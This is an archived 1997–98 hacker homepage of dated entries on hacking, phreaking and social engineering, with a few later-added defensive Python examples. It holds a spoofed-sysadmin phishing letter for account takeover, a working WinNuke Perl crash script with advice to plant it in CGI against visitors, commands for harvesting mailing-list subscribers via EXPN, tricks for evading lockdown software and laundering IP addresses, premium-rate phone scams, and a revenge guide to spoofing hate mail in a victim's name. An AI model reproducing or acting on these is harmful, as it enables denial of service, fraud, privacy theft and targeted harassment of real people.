
originally found at http://www.s-alchemy.com/rsnake/siteb.html

                                   SITE B
                                      
   WELCOME! Welcome to Site B, the next generation in RSnake's hacking
   corner. This is my newest site! Now, if you haven't been to my
   original corner I suggest you visit there before looking any further.
   This is just more of the same, with some new stuff, better
   explanations, and more stuff, and did I mention more stuff? I want
   this site to be as big a hit as my other site was (in its entirety),
   so if you have any suggestions that could make it even better, please
   just mail me and tell me what you want to know about.
   This version (Site B) is NO LONGER hosted by the TCN. Click here to
   find out why.
   The premise of this specific page is to wean myself away from JUST
   talking about the software side of hacking. That is why I don't call
   this page "RSnake's Hacking Corner II" or something of equal
   awfulness. This page will be devoted not only to the software aspects
   of hacking, but also to phreaking and social engineering. It will deal
   with just about every aspect of hacking, as WELL as the software. I
   will try to make this page more diverse in its content, while still
   upholding my standards of fact vs fiction.
   Now, once again, I will give you my warnings about the information
   held on this page. I am merely writing a few thoughts down for
   educational purposes ONLY! If you go out and do stupid shit on your
   own, don't come crying to me. If I put stuff on here that is OBVIOUSLY
   only for breaking and not for hacking (such as the ping bug)
   understand that it is because I have been thinking about it or have
   interest in it, not because I think you should go and try it. Big
   brother IS watching! With that, on with the page!
     _________________________________________________________________
   
--DATE-8-30-97--SOCIAL ENGINEERING--

        Hello all!  Long time no see!  Well to kick off Site B, and to
prove I am a man of my word, my first entry will have to do with social
engineering, and NOT exploits.  This is usable by ANYONE and not just the
Linux/Unix gurus that you fear so much.  Social engineering is the art of
hacking PEOPLE.  Now, don't think that I am some sort of Nazi, trying to
get people to conform to an alternate reality or anything; just think of
social engineering as the ability to tell a lie that produces some
predictable (beneficial) outcome.  It is just being a con artist (more or
less).  First I will give you a usable application, and then talk about
it.  Let's start with a letter (spoofed) from the sys-admin of an internet
provider to one of its paying customers:

     Dear Customer, To provide you, the user, with better security, we
     have recently begun to upgrade our system's security. With the
     threat of malicious computer hackers ever present, we have decided
     to beef up our precautionary measures. In doing so, one of our
     automated password protection systems (APPS) decided that your
     password is insecure. Normally we wouldn't call your attention to
     this, however, recently, we received notice in our logs of attempts
     to crack users' passwords. We fear your security could be
     compromised. Our APPS has provided you with a substitute to your
     current password that is many times more secure against DES
     cracking programs. For the time being we HIGHLY suggest you use the
     password allocated for you (appended automatically to this letter).
     Please do not reply to this letter directly. If you have further
     questions or comments, feel free to contact our business office
     during standard business hours. Below are our APPS program's
     directions. We ask that you read the directions, write them down
     along with your new password, and then delete this letter to ensure
     your privacy. On behalf of our staff, we sincerely apologize for
     this inconvenience, and will update you if anything else directly
     concerns you. We hope you find this new service helpful and
     relatively non-obtrusive. Thank you for your patience and
     understanding. -Sincerely, System Administrator

     -------------------APPS PASSWORD CHANGING PROCEDURE-----------------
     This is an automated message: To change your password exit out of
     your mail and go to your $ prompt, and then type in.... [add your
     own stuff]
     Your new SECURE password to enter: b_/0vG8a
     ------------------------END APPS PROCEDURE--------------------------
     
   Now obviously this is rough, and hopefully you will have done research
   on your target, so you know how to explain how to change the password.
   (Note: make SURE your new password has only numbers, letters and
   symbols, minus @ and # (on many older Unix systems those two are the
   tty line-kill and erase characters, so they get eaten before the
   password program ever sees them), and NOT control or alt characters.)
   Most people will do what they are told, unless they have REASON to
   suspect. Remember to spoof the e-mail (go to my old hacking corner to
   read on how to do that if you don't already know) so it looks like it
   is coming from root at that provider. This is one of many tricks you
   can use to gain remote access to your target machine. Be creative. I
   have seen at least 20 variations on that theme that would all work.
   The human machine is very flawed and easily exploited. If you EVER get
   this kind of e-mail, mail it to me and your local sys-admin. I know
   both of us would be very interested to read it. Stay out of trouble!
   Hasta!
     _________________________________________________________________
   
   WORD OF THE DAY: [anisotropic] RSnake's definition: Say you have a
   circle that is 2"x2" inside this window. If it was drawn with
   anisotropic scaling (x and y scaled independently), and you changed
   the horizontal width of your screen (to 4" instead of 8" for
   instance), the circle would become a vertically elongated ellipse (2"
   tall and 1" wide) because it is proportionally (to the width) the
   same. An isotropically scaled circle, however, keeps its aspect ratio
   regardless of the dimensions of the screen you were viewing it
   through. Netscape and the other hypertext browsers handle images the
   second way, and the same distinction is a fundamental idea when
   programming in VC++ (the MM_ANISOTROPIC and MM_ISOTROPIC mapping
   modes). Hasta!
     _________________________________________________________________
   
   --DATE--9-10-97--WHERE TO LOOK-- Hello! Today I am going to hit on
   where to look for passwords and what to look for when you find
   yourself in a place that might house something interesting (an office
   of some sort). People are stupid. They forget things ALL the time.
   This is something you can take advantage of, BECAUSE, since people
   don't WANT to forget everything they learn every 10 seconds, they have
   a tendency to write things down. Well, in computer security, this is a
   HUGE hazard. If you know where to look, you can find the secrets to
   get yourself into the strangest of places. For instance: a friend and
   I found ourselves needing copies of a paper, so my friend's mother
   took us into the back of her office, and let us have free rein on the
   office copy machine. While there, I noticed that was also the same
   room where the office kept their dialup modems and their main system.
   Within five seconds of random searching I had access to the system.
   How? They left a sticky note on the side of their computer (away from
   the door, hoping that no one would be able to see it). Obviously the
   secretaries had kept forgetting the password to get into the machine,
   so they wrote it down on a sticky note (nice and yellow for the
   passing hacker to notice). Where should you look for these obvious
   places? On the sides of the monitors, on the wall, on file cabinets,
   in the drawers, on the walls of the drawers, under the desk, under a
   book, under the keyboard, under the mouse pad.... Good candidates for
   finding the password are anywhere that is a "good" hiding place. Just
   look around. I read once that the two greatest threats to a computer
   system are the secretaries and temps. Well in this case the
   secretaries were the problem. If you were interested, I didn't exploit
   the system, since it was a friend, and I instead told the mother that
   she should change the system's password and gave her a brief talk on
   computer security. That's where to look. Take it easy! Hasta!
     _________________________________________________________________
   
   --DATE--9-12-97--PEDOPHILIA-- I have recently become involved in one
   of the most vast fights on the internet. This is the fight against
   pedophilia. I am the founder of a group called EHAP (Ethical Hackers
   Against Pedophilia). It is not the purpose of this page to talk about
   it, but if you want more information on this group or its functions,
   please visit our web-site at http://www.hackers.com/ehap to find out
   more. Hasta!
     _________________________________________________________________
   
   --DATE--9-12-97--SPECIAL CHARACTERS-- On one of the mailing lists
   that I was on, I received an e-mail from someone who was compiling a
   program using gcc. The person was annoyed, because "after compiling
   using: gcc 10int.c -o 10int.c it left behind a file called #10int.c#"
   Here is my reply:
   
     Ahh the fun times with "special characters". Well first of all, if
     you want to HIDE files, you can use ~'s as in: ~rsnake meaning,
     when they try to cd into ~rsnake they instead go nowhere but to my
     home directory, unless they know how to get around that... it is
     really easy. just type: rm \#10int.c\# ...the \ tells the shell to
     take the next character literally instead of treating it as
     special. that is the same way you would get into that directory:
     cd \~rsnake You can use that trick as you like of course.. or even
     mess with people and call them other users' names... heheh... That
     file, incidentally, was created not by gcc but by your editor. It
     most likely panicked and left that file as a residue when you
     forcibly quit out. *yawn* Take it easy! Hasta!
     
   In that instance the user mailed me back, and I was right: he had been
   using Xjed (an X11 version of jed, an Emacs-like editor), which had
   panicked out and left behind that file (the #name# form is the
   Emacs-style auto-save file), and after issuing that command he was
   able to get rid of it. Simple? Yup! Take it easy! Hasta!
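   The quoting lesson behind those two commands, as an added example that
   is not from the original page: a Python script that creates the awkward
   names from the text (plus a third one starting with a dash, constructed
   for this example) in a scratch directory and deletes them three
   different ways. The point the reply above only hints at: the backslash
   or quotes stop the shell from treating # and ~ specially, but they do
   nothing about a filename that looks like an option, for that you need
   rm's -- separator, and the safest route of all is to skip the shell
   entirely and pass an argv list. Assumes a POSIX /bin/sh and rm.

```python
import os
import shlex
import subprocess
import tempfile

# Filenames constructed for this example: the two from the text plus one
# that starts with a dash, the classic way to slip an "option" past rm.
AWKWARD = ["#10int.c#", "~rsnake", "-rf"]


def quoted_forms():
    """How shlex.quote would write each name for /bin/sh.  Note that '-rf'
    comes back unchanged: quoting protects against the shell, not against
    the program that receives the argument."""
    return {name: shlex.quote(name) for name in AWKWARD}


def rm_via_shell(dirpath, name, quote):
    """Delete `name` by handing /bin/sh a command *string*.  Returns True if
    the file is gone afterwards.  Unquoted, '#10int.c#' becomes a shell
    comment and rm sees no operand; quoted it works, just like rm \\#10int.c\\#.
    Quoted '-rf' still fails: rm takes it as options and has no operand."""
    arg = shlex.quote(name) if quote else name
    subprocess.run("rm " + arg, shell=True, cwd=dirpath,
                   stderr=subprocess.DEVNULL, check=False)
    return not os.path.lexists(os.path.join(dirpath, name))


def rm_via_argv(dirpath, name):
    """Delete `name` with an argv list: no shell, so no comment, tilde or
    glob processing at all.  '--' ends option parsing so '-rf' is a file."""
    subprocess.run(["rm", "--", name], cwd=dirpath, check=True)
    return not os.path.lexists(os.path.join(dirpath, name))


def demo():
    """Create the three files in a scratch directory and try each deletion."""
    d = tempfile.mkdtemp()
    for name in AWKWARD:
        open(os.path.join(d, name), "w").close()
    results = {
        "shell unquoted #": rm_via_shell(d, "#10int.c#", quote=False),  # False
        "shell quoted #":   rm_via_shell(d, "#10int.c#", quote=True),   # True
        "shell quoted ~":   rm_via_shell(d, "~rsnake", quote=True),     # True
        "shell quoted -rf": rm_via_shell(d, "-rf", quote=True),         # False
        "argv -rf":         rm_via_argv(d, "-rf"),                      # True
    }
    os.rmdir(d)  # only succeeds because every file really was removed
    return results


if __name__ == "__main__":
    print(quoted_forms())
    print(demo())
```

   The same reasoning applies to any program that builds a command line
   from a filename it did not choose: quote for the shell, separate
   options from operands, and prefer no shell at all.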
     _________________________________________________________________
   
   --DATE--11-13-97--WIN NUKE ETC.-- This is a letter I got in reference
   to the old Win-Nuke bug. Thought it might be interesting to you people
   out there. Take it easy...
   
     > Hi,
     > Could you explain a little about the win-nuke bug? i.e. port
     > number, end result, how to exploit it, etc.
     > Thanks

     Sure, the bug is simple: when connecting to port 139 on any
     unpatched NT or 95 machine, all you have to do is send an OOB (out
     of band) packet and the system faults and blue-screens. The end
     result is that the computer gets fried. The only way to use this
     bug is to use a program like win-nuke or build it in Perl (I have
     seen it in one line of Perl) to send an OOB packet to port 139. I
     have a copy of winnuke (designed for Linux/UNIX) on my homepage
     (http://www.s-alchemy.com/rsnake) if you are interested. There is a
     theory going around that if you telnet to port 139 and THEN send an
     OOB packet it will blue-screen patched boxes, but this is NOT true.
     I designed a program similar to Win-nuke called winnewk and it was
     unsuccessful in producing any kind of error on patched boxes. After
     talking directly to Microsoft, it was found that this rumour was
     bunk and there is no way that it would be possible. Not that it
     matters... ;)

     > p.s. very informative page, latest addition to my bookmarks

     Cool... glad to hear it. :) Take it easy. Hasta!
     _________________________________________________________________
   
   --DATE--12-13-97--MORE FOOLPROOF HACKS-- I got this letter a while
   back, and it goes into more of how to get around FoolProof than I went
   into on my other site. I want to make something clear to everyone:
   when I post something on this site, I don't mean that it is the ONLY
   way to do something; in lots of cases there are other and perhaps
   better ways to get around security. I just put a few thoughts down on
   this page to let you guys know there IS a way around these types of
   security. Anyway, here you go... Hasta!

     -- hello, I just stumbled onto your site via skullcap's site, and I
     am most impressed. I've been a long time Mac guy and know other
     ways to disable FoolProof (I've been living with it in school for
     two years straight).
     1. Hold down "shift" during startup. This disables all extensions.
     This rarely works since FoolProof has driver level protection (this
     works best on crappy Classic IIs and what have you). It helps if
     you flick the power switch up & down a few times to jar it up a
     little.
     2. Hold down the space bar at startup. This only works for System
     7.5.x (if it's not, it's probably not worth breaking into anyway).
     This brings up the Extensions Manager control panel. From here you
     just uncheck FoolProof and you're set. This is the best way to
     disable FoolProof that I've seen. Just be sure to turn it on again
     when you're finished.
     3. Write an AppleScript that moves the selected file into another
     folder other than the System Folder. Have yet to find the syntax on
     this, haven't worked on it much.
     There are other things you can do on a Mac after you disabled
     FoolProof. DON'T BE LAME AND REFORMAT THE HARD DRIVE, YOU WILL GET
     CAUGHT. Instead, install ResEdit and the Forker extension and try to
     decrypt the password that's stored in the preferences in the System
     Folder. This isn't really my department but I'm working on that as
     well and will let you know. Other things to do is to check out
     www.machacks.com and install some of those pranking files into the
     computer. Trust me, you want to check out that site if you have a
     Mac. Any way, I love your site keep it cool. Over and Out
     _________________________________________________________________
   
   --DATE--12-15-97--Spoofing DNS in mIRC-- Ever wondered how those
   "3133t" (3133t = eleet = elite) bastards spoof their DNS and IP
   addresses in IRC? Well for the first time it will be explained in
   plain english (sorta). ;) You know that intro screen in mIRC that lets
   you provide mIRC with the information it needs to validate your user
   name et cetera? Well, that is your path to anonymity. Click on that
   far right tab and find the SOCKS control. That is, find the control
   that allows mIRC to use SOCKS firewalls. Now, the trick is to find a
   server that has a firewall that will let you route through it. That
   is the tricky part. Experiment with bigger providers, as they are more
   likely to have a SOCKS firewall installed. Now, put that server name
   into your SOCKS control, and put in a matching e-mail address. IE: if
   the server is asdf.blah.net put in bruno@asdf.blah.net or
   bruno@blah.net or whatever. It has to be similar to fool anyone. You
   are now masked AND you are protected by that firewall, because,
   damnit, you ARE using it as your personal firewall (SOCKS firewall
   that is). You win twice!! ;) Hasta!
     _________________________________________________________________
   
   --DATE--12-16-97--Breaking out of lame security in Win `95-- Stuck
   using a locked Windows `95 machine? Here are some basic techniques to
   get you out and free to roam around. First of all, carry a boot disk
   with you at all times. A boot disk should consist of at least these
   files: command.com autoexec.bat config.sys, plus the hidden io.sys and
   msdos.sys that DOS actually boots from, which is why you should make
   the disk with "sys a:" or "format a: /s" on your own machine (or an
   un-locked one) rather than just copying command.com onto a formatted
   floppy. Then put it into the target machine and cycle the power. That
   works in many cases to get to a DOS prompt. Another technique is to
   use Internet Explorer as a shell. How can it be used as a shell? Well,
   type "c:" as a URL in the "open" common dialog box. It will then
   give you a directory listing of the machine you are using. From there
   you are free to roam the system. Also, Microsoft Word and Excel have
   the same bugs, but there they are found through the help menu. Explore
   around, you'll find it. Hasta!
     _________________________________________________________________
   
   --DATE--12-17-97--How someone made money off his 800 number-- This is
   an interesting hack I found out about from a friend working at a
   university. It is less technical and more social engineering (for
   those unfamiliar with that term, Social Engineering (S.E. for short)
   is the art of lying to get information or to get what you want (lying
   for a purpose vs. lying for shits and giggles)). This hack involved a
   hacker who was looking for some spare cash. This guy set up his own
   personal 800 charge number (he set it up to make charges per
   phone call, like 900 numbers do). So it was NOT a toll free number by
   any means. In fact he made the toll charge extraordinarily high. I am
   guessing on the order of $10 a minute. So he called up the university,
   and who knows where else, (local numbers only of course) and was
   routing his number so it was untraceable (beside the point). Then
   when he got ahold of someone on campus (some lame secretary or
   something) he told them that he was some professor and he needed to
   dial out, but couldn't on his phone, but that it was a toll free
   number. He told her to do it for him, and because she believed it was
   a toll free number it made sense. Thus, she dialed out and the hacker
   stayed on the line for hours at a time (hours * $600/hour = a lot of
   money)!!! If he had more than one phone devoted to it, he could be
   making literally thousands of dollars per hour. After thought: he has
   not been caught yet. ;) Hasta!
     _________________________________________________________________
   
   --DATE--12-18-97--Problem in WinGate (new hack)-- WinGate is a program
   that essentially allows a LAN to connect to the net via a dialup or
   ISDN connection. Information on this product can be found at
   http://www.wingate.net/ The problem is that WinGate lets you telnet to
   it, and then route out through it, thereby "laundering" your IP
   address. This makes you untraceable, and WinGate is brilliant in that
   it doesn't log your address. So unless you are stupid you can get
   away with it. There are several programs out there to discover which
   IPs run WinGate, and many more in creation. This is a PRIME target
   for bulk spammers and spoofers, as well as hackers alike. This could
   have been fixed by binding the proxy to the inner LAN interface only,
   so that it never accepts connections from the Internet side.
   Basically anything you can do on the internet can be done through this
   unwilling laundry service for your source IP, compliments of WinGate.
     _________________________________________________________________
   
   --DATE--12-18-96--Kill Mac with TCP/IP Stack glitch-- Pretty damned
   simple. Pick yourself up a copy of "strobe" and scan the target
   machine from the 1st to the 65535th (last) port. Its TCP/IP stack gets
   overrun and the machine crashes from CPU exhaustion. Pretty simple, I
   told you. And people thought Macs were safe! Pshaw! Hasta!
     _________________________________________________________________
   
   --DATE--12-19-97--Get `em back (revenge)-- Want some real revenge on
   those assholes who flame you? Well, let's assume for a minute that you
   DO have their e-mail address. If you don't then get it; that isn't my
   problem. Now, I hope you know how to spoof e-mail, because if you
   don't you, again, are screwed. Now, assuming you know the person's
   e-mail address, and you know how to spoof, send an e-mail spoofed from
   his/her account to all your local extremists. Send anti-semitic notes
   to the Jewish Coalition, and send pro-semitic stuff to the Nazi, or
   white brotherhood lists. Send core-dumps to the hackers. To every
   extremist group, send hate-mail to the opposite group from your
   target's address. If you have the person's phone number or address,
   tack it on as a phony signature file for good measure. ;) Now how
   about tangible revenge? Now we are assuming you know the person's real
   name AND their address (again, if you don't that isn't my problem
   (although you might want to try http://www.four11.com)). Go to your
   local library (be careful doing this because someone might think you
   are ripping things off), and go through the periodicals section. Then
   go through every single magazine you can think of that would have
   subscription cards in them. (You can also do this at grocery stores or
   book stores, but don't let anyone think you are shop-lifting). Now
   take all those subscription cards and send them from your target's
   address. If you get several hundred and fill them all out, I can
   guarantee you that at least one or two of those (assuming they are
   subscriptions to catalogues etc...) will sell the address and that
   person will be floating in junk mail every day from that point on. The
   best ones to do this with are the R or X rated men's magazines,
   because they sell addresses most often (they have very few scruples
   about such things). It will take a few hours out of your day and will
   cause them more grief than you can know. I don't recommend doing
   either of these tricks unless you hate the person enough to force them
   to change e-mail addresses, phone numbers and possibly even move!
   After thought: most of the best hackers I have known go to the library
   on a regular basis. Just food for thought. The library is a great
   place to learn and is a nice change from the stagnant air of the
   computer labs. ;) Please don't get into any trouble guys/gals. Hasta!
     _________________________________________________________________
   
   --DATE--12-21-97--WinNuke in Perl-- Here it is, just a few lines of
   perl and you are good to go! Malicious website designers can modify
   this to kill off any server through cgi (common gateway interface).
   Someone could stuff this bad-boy into the cgi script on their web-page
   to kill off anyone on a Gates-box. Make sure to change your.target.com
   to the actual address you want to kill... or perhaps make it dynamic
   to kill off people who visit. Hrm... I wonder what the result would be
   if someone hacked, and then put this on the Micro$oft website?

      #!/usr/bin/perl
      use IO::Socket;    # also exports the MSG_OOB constant from Socket
      my $s = IO::Socket::INET->new(PeerAddr => "your.target.com:139")
          or die "connect: $!";
      $s->send("bye", MSG_OOB);   # the urgent (out-of-band) data is the whole trick
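   The other side of the Win-Nuke entries above (the 11-13-97 letter and
   this Perl), as an added example that is not from the page and is not
   the WinNuke program: what a packet filter or intrusion detection rule
   actually keys on. MSG_OOB on a TCP socket is what sets the URG flag and
   a non-zero urgent pointer in the segment, so a filter does not need to
   look at the payload at all. The script builds a bare TCP header in
   memory (no IP header, checksum left zero, ports and sequence numbers
   made up for the example) and checks the pair of fields that make the
   nuke distinctive against a constructed ordinary NetBIOS session packet.

```python
import struct

URG, ACK, PSH = 0x20, 0x10, 0x08
NETBIOS_SSN = 139           # the port WinNuke aims at


def build_tcp_segment(sport, dport, flags, urg_ptr, payload):
    """Constructed 20-byte TCP header (no options, no IP header, checksum 0)
    followed by the payload.  Sequence/ack numbers are dummies."""
    offset_flags = (5 << 12) | flags          # data offset 5 words, flags in low bits
    hdr = struct.pack("!HHIIHHHH", sport, dport, 0x1000, 0x2000,
                      offset_flags, 8192, 0, urg_ptr)
    return hdr + payload


def parse_tcp(segment):
    """Pull the fields a filter needs out of a raw TCP segment."""
    sport, dport, seq, ack, off_flags, win, csum, urg_ptr = \
        struct.unpack("!HHIIHHHH", segment[:20])
    hdr_len = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "flags": off_flags & 0x1FF,
            "urg_ptr": urg_ptr, "payload": segment[hdr_len:]}


def looks_like_winnuke(segment):
    """WinNuke is nothing more than TCP urgent data sent to port 139: MSG_OOB
    sets URG and a non-zero urgent pointer.  NetBIOS session traffic has no
    use for urgent data, so that pair aimed at 139 is a clean signature."""
    p = parse_tcp(segment)
    return p["dport"] == NETBIOS_SSN and bool(p["flags"] & URG) and p["urg_ptr"] > 0


def sample_segments():
    """Two constructed segments: the nuke, and an ordinary session packet
    (0x81 is the NetBIOS session-request type byte; the rest is filler)."""
    nuke = build_tcp_segment(40000, NETBIOS_SSN, URG | PSH | ACK, 3, b"bye")
    normal = build_tcp_segment(40001, NETBIOS_SSN, PSH | ACK, 0,
                               b"\x81\x00\x00\x44")
    return nuke, normal


if __name__ == "__main__":
    for name, seg in zip(("nuke", "normal"), sample_segments()):
        print(name, looks_like_winnuke(seg), parse_tcp(seg))
```

   A real capture would hand this function the TCP portion of each packet
   after stripping the IP header; the check itself does not change. The
   only true fix is the vendor patch the letter above mentions, but the
   rule tells you who is still trying.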
     _________________________________________________________________
   
   --DATE--12-22-97--How write and compile C (1st class)-- Well, I am
   finally going to do it. I am going to write down a couple thoughts on
   writing in C. DO NOT ASK ME TO DO IT ANYMORE, as this is a first thing
   for me, and if I get a whole lot of spam about it, I will stop doing
   it. Alright? How do you compile in the programming language C? Well,
   let's assume you are using Linux or Unix for this task (because
   damnit, it's better!). From your shell you see a $ or a % or a # or
   something similar. Now let's say you have your code in a file called
   "uncompiled_exploit.c" and you want to compile it. It is really very
   easy. Type in this command:

      gcc -o compiled_exploit uncompiled_exploit.c

   The name after the -o is what the compiled program will be called.
   The source file will still be there, but it won't run by itself. Now,
   to run the program you merely type the name of the compiled code at
   the prompt (as ./compiled_exploit, since the current directory is
   usually not on your PATH) and voila! The same is true with any C
   compiler, and even with C++, although dealing with libraries can be
   very tricky. For the time being let's just stick with that, shall we?
   Now let's write our first program in C. Why do I choose C to teach?
   Because once you know C you can write in C++ but not the reverse. A
   LOT of the exploit code you will find is written ONLY in C, and if you
   have a good basis in what you are doing in C you will understand any
   code that you encounter (yes, that even includes VC++, sorta). This
   code is very simple. Type it in EXACTLY as I have it typed. Spaces and
   tabs are not important for the most part, but for your first program,
   just do it exactly as I do for ease. Feel free to omit the comments:

      /* first program: first.c
         this is a comment because it's between the stars and slashes;
         you will just have to get used to these coding conventions */
      #include <stdio.h>   /* this is your standard include library for
                              all your C programs. this allows you to use
                              the printf() function used below */

      int main()
      {
          /* int main is your main function. everything between the {}'s
             is your main function */
          printf("This is how you print a line in C.\n");
          /* the semicolon at the end of the line tells the compiler that
             that line of code is over. the \n means that you want a
             carriage return and to skip down to the next line. */
          printf("You can also put in tabs and quotes "
                 "with the \\t and \" commands: "
                 "\"asdf\tasdf\"\n");
          /* \t makes tabs, \b backspaces, etc... if you want to be able
             to print a \ put a slash before it: \\ like in the above
             example. you also must use this same technique to put quotes
             inside a string. you also may span one statement over
             several lines, as shown above in the printf() call; adjacent
             string literals are glued into one. */
          return 0;
          /* because your main function was declared as an int (an
             integer) it must return a number, so that is what the above
             statement does. if you wanted to signal an error, you would
             return a non-zero value such as 1, but we will get into that
             later. */
      }   /* end of main() */

   Ok, that was your first program. Now to compile it. At your prompt
   type:

      gcc -o first first.c

   If gcc prints error messages, you made a typo somewhere; fix it and
   compile again. (A file called "core" only shows up when a program
   crashes while it is running, not when it fails to compile; if you
   ever see one, ls -la core will show it and rm core gets rid of it.
   That shouldn't happen until you get further in your programming.)
   Make sure you type the program in carefully, or it won't compile. And
   now to run it just type in:

      ./first

   Pretty straightforward? I hope so. ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-4-98--EXPN majordomo exploit-- This is a relatively new bug
   that was uncovered as a vulnerability in sendmail to uncover the
   subscriber list of a majordomo list. When someone sends an e-mail to a
   majordomo list the mail is piped through an alias that wraps the
   message, and that alias refers to other aliases. One of those aliases
   is the real list with the e-mail addresses of all the subscribers in
   it. The potential harm in this is blatantly obvious. To exploit this,
   telnet to the sendmail port (25) of the machine in question, EXPN the
   e-mail address of the majordomo list, and read where the alias goes
   to. From there, EXPN that alias and poof, you have all the e-mail
   addresses of all the subscribers. E.G.:

      telnet target.net 25
      220 target.net ESMTP Sendmail 8.8.5/Target-971021-1 ready at ...
      EXPN mail-list-name
      250 <"/usr/local/mail/majordomo/wrapper resend -l mail-list-name -h target.net mail-list-name-list"@target.net>
      EXPN mail-list-name-list

   And poof... you will have all the e-mail addresses of all the
   subscribers of the mailing list. The name to EXPN the second time is
   the last argument of the resend command inside the alias
   (mail-list-name-list). That is the alias where all the account names
   are stored. Thanks to James Ponder for some of the info here.
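   The same EXPN chase run against a simulated server, as an added example
   that is not from the page: the SMTP replies are constructed to match
   the shape shown above (the program alias is written with sendmail's
   "|program" pipe syntax, and the subscriber addresses, example.org and
   friends, are made up), and a dictionary stands in for the socket so it
   runs offline. It also shows the case a practitioner wants to see: the
   server side fix is to turn EXPN (and VRFY) off in sendmail.cf with
   O PrivacyOptions=noexpn,novrfy (or goaway), after which the very first
   EXPN comes back as a 502 and the harvest returns nothing.

```python
import re

# Constructed SMTP replies standing in for a real server (not captured from
# any host).  Keys are the EXPN argument, values are the reply lines.
FAKE_SERVER = {
    "mail-list-name": [
        '250 <"|/usr/local/mail/majordomo/wrapper resend -l mail-list-name '
        '-h target.net mail-list-name-list"@target.net>',
    ],
    "mail-list-name-list": [
        "250-alice@example.org",
        "250-bob@example.net",
        "250 carol@example.com",
    ],
}

# The same host after PrivacyOptions=noexpn: every EXPN is refused.
HARDENED_SERVER = {}

REFUSED = ["502 5.7.0 Sorry, we do not allow this operation"]

# Last whitespace-separated argument of "resend ..." inside the quoted
# pipe alias, i.e. the alias that holds the real subscriber list.
RESEND_RE = re.compile(r'resend\b.*?\s(\S+)"@')


def expn(server, name):
    """Simulated EXPN: the reply lines the server would send for one alias."""
    return server.get(name, REFUSED)


def list_alias_from_wrapper(reply_line):
    """Pull the subscriber-list alias out of a 'wrapper resend ...' reply."""
    m = RESEND_RE.search(reply_line)
    return m.group(1) if m else None


def harvest(server, list_name, depth=0):
    """Follow EXPN from the public list name down to subscriber addresses.
    Returns [] as soon as the server refuses (the hardened case)."""
    if depth > 4:                       # aliases can loop; do not chase forever
        return []
    members = []
    for line in expn(server, list_name):
        if not line.startswith("250"):
            return []
        body = line[4:].strip()         # drop the "250-" / "250 " prefix
        inner = list_alias_from_wrapper(body) if body.startswith('<"|') else None
        if inner:
            members.extend(harvest(server, inner, depth + 1))
        else:
            members.append(body)
    return members


if __name__ == "__main__":
    print(harvest(FAKE_SERVER, "mail-list-name"))      # three addresses
    print(harvest(HARDENED_SERVER, "mail-list-name"))  # []
```

   Against a live host the two expn() calls would be the same EXPN lines
   typed into the telnet session above; everything else (spotting the
   pipe alias, reading its last argument, following it) is unchanged.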
     _________________________________________________________________
   
   --DATE--1-7-98--How someone made money from his 800 number II--
   Alright, you guys remember the guy calling the university right?
   Alright, well I heard this on a news report on my way to go gamble in
   Reno. Some guy using a normal number (set up like a toll number) calls
   people, and leaves a distressing message about their father or mother
   or something getting into an accident, and that they need to call
   this (toll) number in order to get ahold of them. Then when they call
   the number, it is a machine, set up with broken english, to keep them
   on the line as long as possible. Also, this same person has been
   reported to use pager numbers and other similar scams. He was reported
   charging as much as $100 a minute (which is a bit hard to believe, but
   that is what the radio said). After thought: he has not been caught
   yet. ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-22-98--Thoughts-- Well, today, I am going to write down a
   few thoughts (technical, because I have been thinking about them).
   People often want to know what I am up to these days (because I have
   been falling out of the public eye a tad) so I will appease that, and
   also make an entry while I am at it. First of all, the other day I
   went into a chatroom (because I was bored) and people started asking
   me (this was an HTML chat room by the way) if there was a way to stop
   the chatroom. Well, frankly, until that time, I had never thought
   about crashing it, but now that I have thought about it for a little
   while, YES, there IS a way to use CPU exhaustion to basically slow
   down the room to a halt. I haven't written the program personally but
   I can't see that it would be more than 20-30 lines of shell
   programming at most. You could even do it by hand. It would be using
   the chargen port. You would connect to the remote HTML port via telnet
   on a Linux/Unix box and then pipe chargen (off another machine) into
   it. If you bounced a couple signals, I am SURE you could crash the
   room. It would probably not shut down the port, but it would make it
   so that everyone in the room stopped seeing text, etc... Next, I was
   thinking about Kerberos authentication. Here is why I believe Kerberos
   authentication is a BAD idea for small networks. Unless you have a
   single machine that is producing the Kerberos certificates, you are
   running the risk (since it is a multi user system) that someone can
   hack the Kerberos machine and get ahold of the primary name server
   through trust. Trust is evil, and Kerberos THRIVES on trust. If you
   get a Kerberos ticket you are destined for root. A friend of mine got
   on a HUGE (very secure) network through a very small private linux
   box on an ISDN (it was an assumed trusted machine (STUPID)). He then
   used that machine to log into one of the bigger machines (multiuser)
   and used some social engineering skills to get access to an even
   bigger machine. And then it was a matter of packet sniffing a
   sys-admin's password to get access to the primary name server, and
   then, thanks to Kerberos, he had access to everything (including the
   ability to add his own machine as a trusted machine). Dumb, if you ask
   me. Next. I have been working with a small company designing some
   really nasty authentication for Credit Cards, etc. So for the first
   time, I am working the security aspect of hacking. I got my hands on
   some fairly interesting RSA source code, that allows me to send
   encrypted data over untrusted lines. The problem lies in that to make
   this work, I have to make every computer that wants to use this
   product be able to access C. That might not seem like a problem, but
   there are lots of systems (ISPs) out there that won't allow C or
   precompiled binaries to be run. So this is something I am going to
   have to work out (without recoding PGP into PERL). Next. I have been
   asked to write for an internet magazine. Now, I am not sure what I am
   going to do, but when/if it ever gets off the ground I will let you
   all know about it. Well... I guess that's it for now... Take it easy
   all. Hasta!
     _________________________________________________________________
   
   --DATE--1-26-98--Making money #3-- Okay, here is one I heard from a
   friend (sorta). Now this requires some on-site "hacking". Okay,
   everyone has heard of those department stores, etc., that pay you the
   difference if they have a discount a week later. For instance, say
   something is selling for $45.95 one week, and the next week it goes on
   sale for $38.95; they guarantee you (the customer) that they will pay
   you the difference (the $7 in this case) to avoid "bait and hook"
   lawsuits. So, you find yourself at a department store; what should
   YOU do to take advantage of this? Well, collect EVERY receipt that you
   can find. This means in the trashcans out front, and the dumpster out
   back (if you can get to it), and any that you might happen across
   while in the store. Then keep your eyes on the local papers for that
   store. If you happen to notice that something has gone on sale, you
   just return to that store, and collect the money that is owed to you
   (the bearer of the receipt). The best part is that (aside from the
   loitering part) it is completely legal. Stay out of trouble now, you
   hear? ;) Hasta!
     _________________________________________________________________
   
   --DATE--1-29-98--Mail--

   > Hi I've read your page
   > http://www.s-alchemy.com/rsnake/corner.shtml --kool!
   > I'd have a question:
   > how do I find out if I am on an ELF SYSTEM?
   > what commands?
   > thanks

   Good question, and one that I am unsure of. I will ask a buddy of mine
   and see if he knows the answer. I listed a few on the page. You may
